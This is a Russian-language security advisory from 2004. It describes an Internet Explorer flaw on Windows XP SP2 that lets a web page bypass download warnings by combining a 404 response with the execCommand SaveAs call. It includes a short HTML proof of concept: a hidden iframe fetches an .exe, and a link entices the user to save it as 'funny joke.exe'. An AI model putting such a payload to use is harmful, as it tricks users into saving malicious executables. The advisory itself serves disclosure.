Security Lab

Обход ограничений в Microsoft IE на Windows XP SP2

Дата публикации:22.11.2004
Всего просмотров:2319
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer (IE) на Windows XP SP2

Описание:
Уязвимость обнаружена в Microsoft Internet Explorer на Windows XP SP2. Удаленный атакующий может загрузить на уязвимую систему произвольный файл.

Удаленный атакующий может с помощью специально сформированной web страницы обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на уязвимую систему. Уязвимость реализуется посредством ответа сервера на запрос сообщением HTTP 404 error и вызова метода execCommand. Пример:

<html>
< body>
< iframe src='http://your.domain.com/v.exe?.htm' name=
"NotFound" width="0" height="0"></iframe>
Click <a href=# onclick="javascript:document.frames.NotFound.
document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
< /body>
< /html>

URL производителя: www. microsoft.com

Решение: решение на данный момент не существует
Ссылки: Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets Remote Users Bypass XP SP2 Download Warning Mechanisms